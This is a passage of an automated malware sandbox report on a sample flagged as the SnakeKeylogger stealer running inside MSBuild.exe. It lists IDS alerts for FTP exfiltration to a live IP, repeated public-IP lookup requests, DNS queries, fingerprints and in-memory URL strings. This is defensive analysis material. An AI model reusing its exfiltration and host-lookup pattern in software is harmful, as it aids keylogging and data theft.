            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537BA59h16_2_0537B7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537EE79h16_2_0537EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537D8C1h16_2_0537D618
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537DD19h16_2_0537DA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0537E171h16_2_0537DEC8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2845535 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M4 : 192.168.2.6:50102 -> 50.31.176.103:34028
            Source: Network trafficSuricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.6:50094 -> 50.31.176.103:21
            Source: Network trafficSuricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.6:50114 -> 50.31.176.103:21
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.6:50102 -> 50.31.176.103:34028
            Source: global trafficTCP traffic: 192.168.2.6:50089 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56843 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56856 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56841 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56815 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56885 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56897 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56874 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56880 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56868 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56858 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56914 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56931 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56834 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56891 -> 188.114.96.3:443
            Source: unknownFTP traffic detected: 50.31.176.103:21 -> 192.168.2.6:50094 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56827 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56857 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:56914 -> 188.114.96.3:443 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
            Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
            Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
            Source: unknownTCP traffic detected without corresponding DNS query: 2.16.100.168
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: MSBuild.exe, 00000010.00000002.4699689315.0000000000FBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.h
            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002ED3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: hesaphareketi-01.exe, 00000000.00000002.2285058032.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2338590295.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.80
